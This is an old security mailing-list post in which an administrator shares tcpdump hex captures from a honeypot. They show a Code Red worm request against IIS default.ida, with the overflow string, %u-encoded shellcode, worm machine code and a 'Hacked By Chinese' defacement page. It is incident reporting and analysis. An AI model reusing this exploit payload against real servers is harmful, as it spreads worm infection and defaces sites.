Sorry guys, on my way home, trying to rush out the door .... but before I go, I noticed this - I overlooked it earlier as I'm in quite a hurry. Having analysed it a bit better now (and actually getting a single stream as opposed to several thousand), you see this:
9:15:37.873583 217.86.214.81.4037 > 194.130.109.164.80: S [tcp sum ok] 3804761538:3804761538(0) win 8760 <mss 1460,nop,nop,sackOK> (DF) (ttl 116, id 49118, len 48)
0x0000 4500 0030 bfde 4000 7406 671a d956 d651 E..0..@.t.g..V.Q
0x0010 c282 6da4 0fc5 0050 e2c8 0dc2 0000 0000 ..m....P........
0x0020 7002 2238 8078 0000 0204 05b4 0101 0402 p."8.x..........
19:15:37.873625 194.130.109.164.80 > 217.86.214.81.4037: S [tcp sum ok] 79900976:79900976(0) ack 3804761539 win 5840 <mss 1460,nop,nop,sackOK> (DF) (ttl 64, id 0, len 48)
0x0000 4500 0030 0000 4000 4006 5af9 c282 6da4 E..0..@.@.Z...m.
0x0010 d956 d651 0050 0fc5 04c3 3130 e2c8 0dc3 .V.Q.P....10....
0x0020 7012 16d0 55dc 0000 0204 05b4 0101 0402 p...U...........
19:15:38.200238 217.86.214.81.4037 > 194.130.109.164.80: . [tcp sum ok] 1:1(0) ack 1 win 8760 (DF) (ttl 116, id 49162, len 40)
0x0000 4500 0028 c00a 4000 7406 66f6 d956 d651 E..(..@.t.f..V.Q
0x0010 c282 6da4 0fc5 0050 e2c8 0dc3 04c3 3131 ..m....P......11
0x0020 5010 2238 7738 0000 6d78 0000 0003 P."8w8..mx....
19:15:38.202867 217.86.214.81.4037 > 194.130.109.164.80: P [tcp sum ok] 1:5(4) ack 1 win 8760 (DF) (ttl 116, id 49163, len 44)
0x0000 4500 002c c00b 4000 7406 66f1 d956 d651 E..,..@.t.f..V.Q
0x0010 c282 6da4 0fc5 0050 e2c8 0dc3 04c3 3131 ..m....P......11
0x0020 5018 2238 dbc6 0000 4745 5420 6540 P."8....GET.e@
19:15:38.203063 194.130.109.164.80 > 217.86.214.81.4037: . [tcp sum ok] 1:1(0) ack 5 win 5840 (DF) (ttl 64, id 15641, len 40)
0x0000 4500 0028 3d19 4000 4006 1de8 c282 6da4 E..(=.@.@.....m.
0x0010 d956 d651 0050 0fc5 04c3 3131 e2c8 0dc7 .V.Q.P....11....
0x0020 5010 16d0 829c 0000 P.......
19:15:38.404751 217.86.214.81.4037 > 194.130.109.164.80: P [tcp sum ok] 5:1465(1460) ack 1 win 8760 (DF) (ttl 116, id 49164, len 1500)
0x0000 4500 05dc c00c 4000 7406 6140 d956 d651 E.....@.t.a@.V.Q
0x0010 c282 6da4 0fc5 0050 e2c8 0dc7 04c3 3131 ..m....P......11
0x0020 5018 2238 73c8 0000 2f64 6566 6175 6c74 P."8s.../default
0x0030 2e69 6461 3f4e 4e4e 4e4e 4e4e 4e4e 4e4e .ida?NNNNNNNNNNN
0x0040 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e NNNNNNNNNNNNNNNN
0x0050 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e NNNNNNNNNNNNNNNN
0x0060 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e NNNNNNNNNNNNNNNN
0x0070 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e NNNNNNNNNNNNNNNN
0x0080 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e NNNNNNNNNNNNNNNN
0x0090 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e NNNNNNNNNNNNNNNN
0x00a0 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e NNNNNNNNNNNNNNNN
0x00b0 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e NNNNNNNNNNNNNNNN
0x00c0 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e NNNNNNNNNNNNNNNN
0x00d0 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e NNNNNNNNNNNNNNNN
0x00e0 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e NNNNNNNNNNNNNNNN
0x00f0 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e NNNNNNNNNNNNNNNN
0x0100 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e NNNNNNNNNNNNNNNN
0x0110 4e4e 4e4e 4e25 7539 3039 3025 7536 3835 NNNNN%u9090%u685
0x0120 3825 7563 6264 3325 7537 3830 3125 7539 8%ucbd3%u7801%u9
0x0130 3039 3025 7536 3835 3825 7563 6264 3325 090%u6858%ucbd3%
0x0140 7537 3830 3125 7539 3039 3025 7536 3835 u7801%u9090%u685
0x0150 3825 7563 6264 3325 7537 3830 3125 7539 8%ucbd3%u7801%u9
0x0160 3039 3025 7539 3039 3025 7538 3139 3025 090%u9090%u8190%
0x0170 7530 3063 3325 7530 3030 3325 7538 6230 u00c3%u0003%u8b0
0x0180 3025 7535 3331 6225 7535 3366 6625 7530 0%u531b%u53ff%u0
0x0190 3037 3825 7530 3030 3025 7530 303d 6120 078%u0000%u00=a.
0x01a0 2048 5454 502f 312e 300d 0a43 6f6e 7465 .HTTP/1.0..Conte
0x01b0 6e74 2d74 7970 653a 2074 6578 742f 786d nt-type:.text/xm
0x01c0 6c0a 484f 5354 3a77 7777 2e77 6f72 6d2e l.HOST:www.worm.
0x01d0 636f 6d0a 2041 6363 6570 743a 202a 2f2a com..Accept:.*/*
0x01e0 0a43 6f6e 7465 6e74 2d6c 656e 6774 683a .Content-length:
0x01f0 2033 3536 3920 0d0a 0d0a 558b ec81 ec18 .3569.....U.....
0x0200 0200 0053 5657 8dbd e8fd ffff b986 0000 ...SVW..........
0x0210 00b8 cccc cccc f3ab c785 70fe ffff 0000 ..........p.....
0x0220 0000 e90a 0b00 008f 8568 feff ff8d bdf0 .........h......
0x0230 feff ff64 a100 0000 0089 4708 6489 3d00 ...d......G.d.=.
0x0240 0000 00e9 6f0a 0000 8f85 60fe ffff c785 ....o.....`.....
0x0250 f0fe ffff ffff ffff 8b85 68fe ffff 83e8 ..........h.....
0x0260 0789 85f4 feff ffc7 8558 feff ff00 00e0 .........X......
0x0270 77e8 9b0a 0000 83bd 70fe ffff 000f 85dd w.......p.......
0x0280 0100 008b 8d58 feff ff81 c100 0001 0089 .....X..........
0x0290 8d58 feff ff81 bd58 feff ff00 0000 7875 .X.....X......xu
0x02a0 0ac7 8558 feff ff00 00f0 bf8b 9558 feff ...X.........X..
0x02b0 ff33 c066 8b02 3d4d 5a00 000f 859a 0100 .3.f..=MZ.......
0x02c0 008b 8d58 feff ff8b 513c 8b85 58fe ffff ...X....Q<..X...
0x02d0 33c9 668b 0c10 81f9 5045 0000 0f85 7901 3.f.....PE....y.
0x02e0 0000 8b95 58fe ffff 8b42 3c8b 8d58 feff ....X....B<..X..
0x02f0 ff8b 5401 7803 9558 feff ff89 9554 feff ..T.x..X.....T..
0x0300 ff8b 8554 feff ff8b 480c 038d 58fe ffff ...T....H...X...
0x0310 898d 4cfe ffff 8b95 4cfe ffff 813a 4b45 ..L.....L....:KE
0x0320 524e 0f85 3301 0000 8b85 4cfe ffff 8178 RN..3.....L....x
0x0330 0445 4c33 320f 8520 0100 008b 8d58 feff .EL32........X..
0x0340 ff89 8d34 feff ff8b 9554 feff ff8b 8558 ...4.....T.....X
0x0350 feff ff03 4220 8985 4cfe ffff c785 48fe ....B...L.....H.
0x0360 ffff 0000 0000 eb1e 8b8d 48fe ffff 83c1 ..........H.....
0x0370 0189 8d48 feff ff8b 954c feff ff83 c204 ...H.....L......
0x0380 8995 4cfe ffff 8b85 54fe ffff 8b8d 48fe ..L.....T.....H.
0x0390 ffff 3b48 180f 8dc0 0000 008b 954c feff ..;H.........L..
0x03a0 ff8b 028b 8d58 feff ff81 3c01 4765 7450 .....X....<.GetP
0x03b0 0f85 a000 0000 8b95 4cfe ffff 8b02 8b8d ........L.......
0x03c0 58fe ffff 817c 0104 726f 6341 0f85 8400 X....|..rocA....
0x03d0 0000 8b95 48fe ffff 0395 48fe ffff 0395 ....H.....H.....
0x03e0 58fe ffff 8b85 54fe ffff 8b48 2433 c066 X.....T....H$3.f
0x03f0 8b04 0a89 854c feff ff8b 8d54 feff ff8b .....L.....T....
0x0400 5110 8b85 4cfe ffff 8d4c 10ff 898d 4cfe Q...L....L....L.
0x0410 ffff 8b95 4cfe ffff 0395 4cfe ffff 0395 ....L.....L.....
0x0420 4cfe ffff 0395 4cfe ffff 0395 58fe ffff L.....L.....X...
0x0430 8b85 54fe ffff 8b48 1c8b 140a 8995 4cfe ..T....H......L.
0x0440 ffff 8b85 4cfe ffff 0385 58fe ffff 8985 ....L.....X.....
0x0450 70fe ffff eb05 e90d ffff ffe9 16fe ffff p...............
0x0460 8dbd f0fe ffff 8b47 0864 a300 0000 0083 .......G.d......
0x0470 bd70 feff ff00 7505 e938 0800 00c7 854c .p....u..8.....L
0x0480 feff ff01 0000 00eb 0f8b 8d4c feff ff83 ...........L....
0x0490 c101 898d 4cfe ffff 8b95 68fe ffff 0fbe ....L.....h.....
0x04a0 0285 c00f 848d 0000 008b 8d68 feff ff0f ...........h....
0x04b0 be11 83fa 0975 218b 8568 feff ff83 c001 .....u!..h......
0x04c0 8bf4 50ff 9590 feff ff3b f490 434b 434b ..P......;..CKCK
0x04d0 8985 34fe ffff eb2a 8bf4 8b8d 68fe ffff ..4....*....h...
0x04e0 518b 9534 feff ff52 ff95 70fe ffff 3bf4 Q..4...R..p...;.
0x04f0 9043 4b43 4b8b 8d4c feff ff89 848d 8cfe .CKCK..L........
0x0500 ffff eb0f 8b95 68fe ffff 83c2 0189 9568 ......h........h
0x0510 feff ff8b 8568 feff ff0f be08 85c9 7402 .....h........t.
0x0520 ebe2 8b95 68fe ffff 83c2 0189 9568 feff ....h........h..
0x0530 ffe9 53ff ffff 8b85 68fe ffff 83c0 0189 ..S.....h.......
0x0540 8568 feff ff8b 4d08 8b91 8400 0000 8995 .h....M.........
0x0550 6cfe ffff c785 4cfe ffff 0400 0000 c685 l.....L.........
0x0560 d0fe ffff 688b 4508 8985 d1fe ffff c785 ....h.E.........
0x0570 d5fe ffff 5b53 53ff c785 d9fe ffff 6378 ....[SS.......cx
0x0580 9090 8b4d 088b 5110 8995 50fe ffff 83bd ...M..Q...P.....
0x0590 50fe ffff 0075 268b f46a 008d 854c feff P....u&..j...L..
0x05a0 ff50 8b8d 68fe ffff 518b 5508 8b42 0850 .P..h...Q.U..B.P
0x05b0 ff95 6cfe ffff 3bf4 9043 4b43 4b83 bd50 ..l...;..CKCK..P
0x05c0 feff ff64 7d5c 8b8d 50fe ffff 83c1 0189 ...d}\..P.......
0x05d0 8d50 feff ff8b 9550 feff ff69 .P.....P...i
19:15:38.404825 194.130.109.164.80 > 217.86.214.81.4037: . [tcp sum ok] 1:1(0) ack 1465 win 8760 (DF) (ttl 64, id 15642, len 40)
0x0000 4500 0028 3d1a 4000 4006 1de7 c282 6da4 E..(=.@.@.....m.
0x0010 d956 d651 0050 0fc5 04c3 3131 e2c8 137b .V.Q.P....11...{
0x0020 5010 2238 7180 0000 P."8q...
19:15:38.405121 194.130.109.164.80 > 217.86.214.81.4037: P [tcp sum ok] 1:500(499) ack 1465 win 8760 (DF) (ttl 64, id 15643, len 539)
0x0000 4500 021b 3d1b 4000 4006 1bf3 c282 6da4 E...=.@.@.....m.
0x0010 d956 d651 0050 0fc5 04c3 3131 e2c8 137b .V.Q.P....11...{
0x0020 5018 2238 4829 0000 4854 5450 2f31 2e31 P."8H)..HTTP/1.1
0x0030 2034 3030 2042 6164 2052 6571 7565 7374 .400.Bad.Request
0x0040 0d0a 4461 7465 3a20 5475 652c 2031 3720 ..Date:.Tue,.17.
0x0050 4a75 6c20 3230 3031 2031 383a 3135 3a33 Jul.2001.18:15:3
0x0060 3820 474d 540d 0a53 6572 7665 723a 2041 8.GMT..Server:.A
0x0070 7061 6368 652f 312e 332e 3230 2028 556e pache/1.3.20.(Un
0x0080 6978 2920 5048 502f 342e 302e 360d 0a43 ix).PHP/4.0.6..C
0x0090 6f6e 6e65 6374 696f 6e3a 2063 6c6f 7365 onnection:.close
0x00a0 0d0a 436f 6e74 656e 742d 5479 7065 3a20 ..Content-Type:.
0x00b0 7465 7874 2f68 746d 6c3b 2063 6861 7273 text/html;.chars
0x00c0 6574 3d69 736f 2d38 3835 392d 310d 0a0d et=iso-8859-1...
0x00d0 0a3c 2144 4f43 5459 5045 2048 544d 4c20 .<!DOCTYPE.HTML.
0x00e0 5055 424c 4943 2022 2d2f 2f49 4554 462f PUBLIC."-//IETF/
0x00f0 2f44 5444 2048 544d 4c20 322e 302f 2f45 /DTD.HTML.2.0//E
0x0100 4e22 3e0a 3c48 544d 4c3e 3c48 4541 443e N">.<HTML><HEAD>
0x0110 0a3c 5449 544c 453e 3430 3020 4261 6420 .<TITLE>400.Bad.
0x0120 5265 7175 6573 743c 2f54 4954 4c45 3e0a Request</TITLE>.
0x0130 3c2f 4845 4144 3e3c 424f 4459 3e0a 3c48 </HEAD><BODY>.<H
0x0140 313e 4261 6420 5265 7175 6573 743c 2f48 1>Bad.Request</H
0x0150 313e 0a59 6f75 7220 6272 6f77 7365 7220 1>.Your.browser.
0x0160 7365 6e74 2061 2072 6571 7565 7374 2074 sent.a.request.t
0x0170 6861 7420 7468 6973 2073 6572 7665 7220 hat.this.server.
0x0180 636f 756c 6420 6e6f 7420 756e 6465 7273 could.not.unders
0x0190 7461 6e64 2e3c 503e 0a43 6c69 656e 7420 tand.<P>.Client.
0x01a0 7365 6e74 206d 616c 666f 726d 6564 2048 sent.malformed.H
0x01b0 6f73 7420 6865 6164 6572 3c50 3e0a 3c48 ost.header<P>.<H
0x01c0 523e 0a3c 4144 4452 4553 533e 4170 6163 R>.<ADDRESS>Apac
0x01d0 6865 2f31 2e33 2e32 3020 5365 7276 6572 he/1.3.20.Server
0x01e0 2061 7420 7469 7461 6e69 612e 696e 6672 .at.titania.infr
0x01f0 6f6e 742e 636f 2e75 6b20 506f 7274 2038 ont.co.uk.Port.8
0x0200 303c 2f41 4444 5245 5353 3e0a 3c2f 424f 0</ADDRESS>.</BO
0x0210 4459 3e3c 2f48 544d 4c3e 0a DY></HTML>.
19:15:38.405193 194.130.109.164.80 > 217.86.214.81.4037: F [tcp sum ok] 500:500(0) ack 1465 win 8760 (DF) (ttl 64, id 15644, len 40)
0x0000 4500 0028 3d1c 4000 4006 1de5 c282 6da4 E..(=.@.@.....m.
0x0010 d956 d651 0050 0fc5 04c3 3324 e2c8 137b .V.Q.P....3$...{
0x0020 5011 2238 6f8c 0000 P."8o...
19:15:38.950063 217.86.214.81.4037 > 194.130.109.164.80: . [tcp sum ok] 1465:2925(1460) ack 1 win 8760 (DF) (ttl 116, id 49212, len 1500)
0x0000 4500 05dc c03c 4000 7406 6110 d956 d651 E....<@.t.a..V.Q
0x0010 c282 6da4 0fc5 0050 e2c8 137b 04c3 3131 ..m....P...{..11
0x0020 5010 2238 e9b2 0000 d28d 66f0 5089 9574 P."8......f.P..t
0x0030 feff ff8b 4508 8b8d 50fe ffff 8948 108b ....E...P....H..
0x0040 f48d 952c feff ff52 6a00 8d85 4cfe ffff ...,...Rj...L...
0x0050 508d 8dd0 feff ff51 6a00 6a00 ff95 98fe P......Qj.j.....
0x0060 ffff 3bf4 9043 4b43 4be9 9f01 0000 8bf4 ..;..CKCK.......
0x0070 ff95 a4fe ffff 3bf4 9043 4b43 4b89 854c ......;..CKCK..L
0x0080 feff ff8b 954c feff ff81 e2ff ff00 0089 .....L..........
0x0090 954c feff ff81 bd4c feff ff09 0400 0074 .L.....L.......t
0x00a0 05e9 6701 0000 8bf4 6800 dd6d 00ff 95a0 ..g.....h..m....
0x00b0 feff ff3b f490 434b 434b e980 0600 008f ...;..CKCK......
0x00c0 854c feff ff8b 8534 feff ff89 85cc feff .L.....4........
0x00d0 ff8b 8d4c feff ff8b 95b0 feff ff89 118b ...L............
0x00e0 854c feff ff8b 8dc8 feff ff89 4804 8b95 .L..........H...
0x00f0 68fe ffff 8995 50fe ffff eb0f 8b85 50fe h.....P.......P.
0x0100 ffff 83c0 0189 8550 feff ff8b 8d68 feff .......P.....h..
0x0110 ff81 c100 0100 0039 8d50 feff ff73 128b .......9.P...s..
0x0120 9550 feff ff81 3a4c 4d54 4875 02eb 02eb .P....:LMTHu....
0x0130 cb8b 8550 feff ff83 c004 8b8d 4cfe ffff ...P........L...
0x0140 8941 088b f48d 9548 feff ff52 6a04 6800 .A.....H...Rj.h.
0x0150 4000 008b 85cc feff ff50 ff95 a8fe ffff @........P......
0x0160 3bf4 9043 4b43 4bc7 854c feff ff00 0000 ;..CKCK..L......
0x0170 00eb 0f8b 8d4c feff ff83 c101 898d 4cfe .....L........L.
0x0180 ffff 81bd 4cfe ffff 0030 0000 7d56 8b95 ....L....0..}V..
0x0190 ccfe ffff 0395 4cfe ffff 8b02 3b85 b0fe ......L.....;...
0x01a0 ffff 753e 8b8d ccfe ffff 038d 4cfe ffff ..u>........L...
0x01b0 8b95 60fe ffff 8911 8bf4 6800 5125 02ff ..`.......h.Q%..
0x01c0 95a0 feff ff3b f490 434b 434b 8b85 ccfe .....;..CKCK....
0x01d0 ffff 0385 4cfe ffff 8b8d b0fe ffff 8908 ....L...........
0x01e0 eb02 eb8f 8bf4 8d95 4cfe ffff 528b 8548 ........L...R..H
0x01f0 feff ff50 6800 4000 008b 8dcc feff ff51 ...Ph.@........Q
0x0200 ff95 a8fe ffff 3bf4 9043 4b43 4bba 0100 ......;..CKCK...
0x0210 0000 85d2 0f84 e704 0000 8bf4 6a00 6880 ............j.h.
0x0220 0000 006a 036a 006a 0168 0000 0080 8b85 ...j.j.j.h......
0x0230 68fe ffff 83c0 6350 ff95 9cfe ffff 3bf4 h.....cP......;.
0x0240 9043 4b43 4b89 8530 feff ff83 bd30 feff .CKCK..0.....0..
0x0250 ffff 741f b901 0000 0085 c974 168b f468 ..t........t...h
0x0260 ffff ff7f ff95 a0fe ffff 3bf4 9043 4b43 ..........;..CKC
0x0270 4beb e18b f48d 9538 feff ff52 ff95 94fe K......8...R....
0x0280 ffff 3bf4 9043 4b43 4b8b 853e feff ff89 ..;..CKCK..>....
0x0290 854c feff ff8b 8d4c feff ff81 e1ff ff00 .L.....L........
0x02a0 0089 8d4c feff ff83 bd4c feff ff14 0f8c ...L.....L......
0x02b0 4701 0000 ba01 0000 0085 d20f 843a 0100 G............:..
0x02c0 008b f48d 8538 feff ff50 ff95 94fe ffff .....8...P......
0x02d0 3bf4 9043 4b43 4b8b 8d3e feff ff89 8d4c ;..CKCK..>.....L
0x02e0 feff ff8b 954c feff ff81 e2ff ff00 0089 .....L..........
0x02f0 954c feff ff83 bd4c feff ff1c 7c1f b801 .L.....L....|...
0x0300 0000 0085 c074 168b f468 ffff ff7f ff95 .....t...h......
0x0310 a0fe ffff 3bf4 9043 4b43 4beb e18b f46a ....;..CKCK....j
0x0320 64ff 95a0 feff ff3b f490 434b 434b 8bf4 d......;..CKCK..
0x0330 6a00 6a01 6a02 ff95 b8fe ffff 3bf4 9043 j.j.j.......;..C
0x0340 4b43 4b89 8578 feff ff66 c785 7cfe ffff KCK..x...f..|...
0x0350 0200 66c7 857e feff ff00 50c7 8580 feff ..f..~....P.....
0x0360 ffc6 89f0 5b8b f46a 108d 8d7c feff ff51 ....[..j...|...Q
0x0370 8b95 78fe ffff 52ff 95bc feff ff3b f490 ..x...R......;..
0x0380 434b 434b c785 4cfe ffff 0000 0000 eb0f CKCK..L.........
0x0390 8b85 4cfe ffff 83c0 0189 854c feff ff81 ..L........L....
0x03a0 bd4c feff ff00 8001 007d 378b f468 e803 .L.......}7..h..
0x03b0 0000 ff95 a0fe ffff 3bf4 9043 4b43 4b8b ........;..CKCK.
0x03c0 f46a 006a 018d 8dfc feff ff51 8b95 78fe .j.j.......Q..x.
0x03d0 ffff 52ff 95c0 feff ff3b f490 434b 434b ..R......;..CKCK
0x03e0 ebae 8bf4 6800 0000 01ff 95a0 feff ff3b ....h..........;
0x03f0 f490 434b 434b e9b9 feff ff8b 8544 feff ..CKCK.......D..
0x0400 ff89 8550 feff ff8b 8d50 feff ff0f af8d ...P.....P......
0x0410 50fe ffff 69c9 e359 cd00 8b95 50fe ffff P...i..Y....P...
0x0420 69d2 b9e1 0100 8b85 74fe ffff 03c1 03d0 i.......t.......
0x0430 8995 50fe ffff 8b8d 74fe ffff 69c9 8333 ..P.....t...i..3
0x0440 cf00 81c1 53fe 6b07 898d 74fe ffff 8b95 ....S.k...t.....
0x0450 74fe ffff 81e2 ff00 0000 8995 50fe ffff t...........P...
0x0460 83bd 50fe ffff 7f74 0c81 bd50 feff ffe0 ..P....t...P....
0x0470 0000 0075 118b 8574 feff ff05 a90d 0200 ...u...t........
0x0480 8985 74fe ffff 8bf4 6a64 ff95 a0fe ffff ..t.....jd......
0x0490 3bf4 9043 4b43 4b8b f46a 006a 016a 02ff ;..CKCK..j.j.j..
0x04a0 95b8 feff ff3b f490 434b 434b 8985 78fe .....;..CKCK..x.
0x04b0 ffff 66c7 857c feff ff02 0066 c785 7efe ..f..|.....f..~.
0x04c0 ffff 0050 8b8d 74fe ffff 898d 80fe ffff ...P..t.........
0x04d0 8bf4 6a10 8d95 7cfe ffff 528b 8578 feff ..j...|...R..x..
0x04e0 ff50 ff95 bcfe ffff 3bf4 9043 4b43 4b85 .P......;..CKCK.
0x04f0 c00f 85ef 0100 008b f46a 006a 048b 8d68 .........j.j...h
0x0500 feff ff51 8b95 78fe ffff 52ff 95c0 feff ...Q..x...R.....
0x0510 ff3b f490 434b 434b c785 4cfe ffff 0000 .;..CKCK..L.....
0x0520 0000 8b45 088b 4868 898d 64fe ffff eb1e ...E..Hh..d.....
0x0530 8b95 64fe ffff 83c2 0189 9564 feff ff8b ..d........d....
0x0540 854c feff ff83 c001 8985 4cfe ffff 8b8d .L........L.....
0x0550 64fe ffff 0fbe 1185 d274 02eb d38b f46a d........t.....j
0x0560 008b 854c feff ff50 8b4d 088b 5168 528b ...L...P.M..QhR.
0x0570 8578 feff ff50 ff95 c0fe ffff 3bf4 9043 .x...P......;..C
0x0580 4b43 4b8b f46a 006a 018b 8d68 feff ff83 KCK..j.j...h....
0x0590 c105 518b 9578 feff ff52 ff95 c0fe ffff ..Q..x...R......
0x05a0 3bf4 9043 4b43 4bc7 854c feff ff00 0000 ;..CKCK..L......
0x05b0 008b 4508 8b48 6489 8d64 feff ffeb 1e8b ..E..Hd..d......
0x05c0 9564 feff ff83 c201 8995 64fe ffff 8b85 .d........d.....
0x05d0 4cfe ffff 83c0 0189 854c feff L........L..
19:15:38.986071 194.130.109.164.80 > 217.86.214.81.4037: . [tcp sum ok] 501:501(0) ack 2925 win 11680 (DF) (ttl 64, id 15645, len 40)
0x0000 4500 0028 3d1d 4000 4006 1de4 c282 6da4 E..(=.@.@.....m.
0x0010 d956 d651 0050 0fc5 04c3 3325 e2c8 192f .V.Q.P....3%.../
0x0020 5010 2da0 5e70 0000 P.-.^p..
Then the packet below. I caught the one below first for obvious reasons: "Hacked By Chinese". :) That's pretty much the whole stream (bar the bye-byes).
HTH some more.
Rgds,
Scott
Scott Nursten wrote:
>
> Hi guys,
>
> >From Thursday last week, I have had thousands (21296) of attempted connects from thousands (7650) of hosts to port 80 on a host on my network that does not have a web server running. I decided to open this up on my firewall and setup a small honeypot to see what the traffic was about. Lo and behold:
>
> 18:59:07.487672 210.239.180.224.32769 > 194.130.109.164.80: P [tcp sum ok] 2925:4040(1115) ack 1 win 17520 (DF) (ttl 104, id 46743, len 1155)
> 0x0000 4500 0483 b697 4000 6806 9fe6 d2ef b4e0 E.....@.h.......
> 0x0010 c282 6da4 8001 0050 c56d 3b34 c6fa 9e83 ..m....P.m;4....
> 0x0020 5018 4470 5da3 0000 ff8b 8d64 feff ff0f P.Dp]......d....
> 0x0030 be11 85d2 7402 ebd3 8bf4 6a00 8b85 4cfe ....t.....j...L.
> 0x0040 ffff 508b 4d08 8b51 6452 8b85 78fe ffff ..P.M..QdR..x...
> 0x0050 50ff 95c0 feff ff3b f490 434b 434b c785 P......;..CKCK..
> 0x0060 4cfe ffff 0000 0000 8b8d 68fe ffff 83c1 L.........h.....
> 0x0070 0789 8d64 feff ffeb 1e8b 9564 feff ff83 ...d.......d....
> 0x0080 c201 8995 64fe ffff 8b85 4cfe ffff 83c0 ....d.....L.....
> 0x0090 0189 854c feff ff8b 8d64 feff ff0f be11 ...L.....d......
> 0x00a0 85d2 7402 ebd3 8bf4 6a00 8b85 4cfe ffff ..t.....j...L...
> 0x00b0 508b 8d68 feff ff83 c107 518b 9578 feff P..h......Q..x..
> 0x00c0 ff52 ff95 c0fe ffff 3bf4 9043 4b43 4b8b .R......;..CKCK.
> 0x00d0 4508 8b48 7089 8d4c feff ff8b f46a 008b E..Hp..L.....j..
> 0x00e0 954c feff ff52 8b45 088b 4878 518b 9578 .L...R.E..HxQ..x
> 0x00f0 feff ff52 ff95 c0fe ffff 3bf4 9043 4b43 ...R......;..CKC
> 0x0100 4bc6 85fc feff ff00 8bf4 6a00 6800 0100 K.........j.h...
> 0x0110 008d 85fc feff ff50 8b8d 78fe ffff 51ff .......P..x...Q.
> 0x0120 95c4 feff ff3b f490 434b 434b 8985 4cfe .....;..CKCK..L.
> 0x0130 ffff 8bf4 8b95 78fe ffff 52ff 95c8 feff ......x...R.....
> 0x0140 ff3b f490 434b 434b e90c fbff ffeb fee8 .;..CKCK........
> 0x0150 8cf5 ffff eb30 5883 c005 5557 5356 506a .....0X...UWSVPj
> 0x0160 3c8b f083 c60c 5668 0001 0000 ff70 08ff <.....Vh.....p..
> 0x0170 7424 28ff 1058 50ff 7424 18ff 5004 585e t$(..XP.t$..P.X^
> 0x0180 5b5f 5dff 2090 e8cb ffff ffe8 7bf9 ffff [_].........{...
> 0x0190 b878 5634 12b8 7856 3412 b878 5634 12b8 .xV4..xV4..xV4..
> 0x01a0 7856 3412 b878 5634 1258 508b bd68 feff xV4..xV4.XP..h..
> 0x01b0 ff89 47f2 c38b 4424 0c05 b800 0000 c700 ..G...D$........
> 0x01c0 2aa8 4c00 33c0 c3eb ece8 f1f4 ffff 4c6f *.L.3.........Lo
> 0x01d0 6164 4c69 6272 6172 7941 0047 6574 5379 adLibraryA.GetSy
> 0x01e0 7374 656d 5469 6d65 0043 7265 6174 6554 stemTime.CreateT
> 0x01f0 6872 6561 6400 4372 6561 7465 4669 6c65 hread.CreateFile
> 0x0200 4100 536c 6565 7000 4765 7453 7973 7465 A.Sleep.GetSyste
> 0x0210 6d44 6566 6175 6c74 4c61 6e67 4944 0056 mDefaultLangID.V
> 0x0220 6972 7475 616c 5072 6f74 6563 7400 0969 irtualProtect..i
> 0x0230 6e66 6f63 6f6d 6d2e 646c 6c00 5463 7053 nfocomm.dll.TcpS
> 0x0240 6f63 6b53 656e 6400 0957 5332 5f33 322e ockSend..WS2_32.
> 0x0250 646c 6c00 736f 636b 6574 0063 6f6e 6e65 dll.socket.conne
> 0x0260 6374 0073 656e 6400 7265 6376 0063 6c6f ct.send.recv.clo
> 0x0270 7365 736f 636b 6574 0009 7733 7376 632e sesocket..w3svc.
> 0x0280 646c 6c00 0047 4554 2000 3f00 2020 4854 dll..GET..?...HT
> 0x0290 5450 2f31 2e30 0d0a 436f 6e74 656e 742d TP/1.0..Content-
> 0x02a0 7479 7065 3a20 7465 7874 2f78 6d6c 0a48 type:.text/xml.H
> 0x02b0 4f53 543a 7777 772e 776f 726d 2e63 6f6d OST:www.worm.com
> 0x02c0 0a20 4163 6365 7074 3a20 2a2f 2a0a 436f ..Accept:.*/*.Co
> 0x02d0 6e74 656e 742d 6c65 6e67 7468 3a20 3335 ntent-length:.35
> 0x02e0 3639 200d 0a0d 0a00 633a 5c6e 6f74 776f 69......c:\notwo
> 0x02f0 726d 004c 4d54 480d 0a3c 6874 6d6c 3e3c rm.LMTH..<html><
> 0x0300 6865 6164 3e3c 6d65 7461 2068 7474 702d head><meta.http-
> 0x0310 6571 7569 763d 2243 6f6e 7465 6e74 2d54 equiv="Content-T
> 0x0320 7970 6522 2063 6f6e 7465 6e74 3d22 7465 ype".content="te
> 0x0330 7874 2f68 746d 6c3b 2063 6861 7273 6574 xt/html;.charset
> 0x0340 3d65 6e67 6c69 7368 223e 3c74 6974 6c65 =english"><title
> 0x0350 3e48 454c 4c4f 213c 2f74 6974 6c65 3e3c >HELLO!</title><
> 0x0360 2f68 6561 643e 3c62 6164 793e 3c68 7220 /head><bady><hr.
> 0x0370 7369 7a65 3d35 3e3c 666f 6e74 2063 6f6c size=5><font.col
> 0x0380 6f72 3d22 7265 6422 3e3c 7020 616c 6967 or="red"><p.alig
> 0x0390 6e3d 2263 656e 7465 7222 3e57 656c 636f n="center">Welco
> 0x03a0 6d65 2074 6f20 6874 7470 3a2f 2f77 7777 me.to.http://www
> 0x03b0 2e77 6f72 6d2e 636f 6d20 213c 6272 3e3c .worm.com.!<br><
> 0x03c0 6272 3e48 6163 6b65 6420 4279 2043 6869 br>Hacked.By.Chi
> 0x03d0 6e65 7365 213c 2f66 6f6e 743e 3c2f 6872 nese!</font></hr
> 0x03e0 3e3c 2f62 6164 793e 3c2f 6874 6d6c 3e20 ></bady></html>.
> 0x03f0 2020 2020 2020 2020 2020 2020 2020 2020 ................
> 0x0400 2020 2020 2020 2020 2020 2020 2020 2020 ................
> 0x0410 2020 2020 2020 2020 2020 2020 2020 2020 ................
> 0x0420 2020 2020 2020 2020 2020 2020 2020 2020 ................
> 0x0430 2020 2020 2020 2020 2020 2020 2020 2020 ................
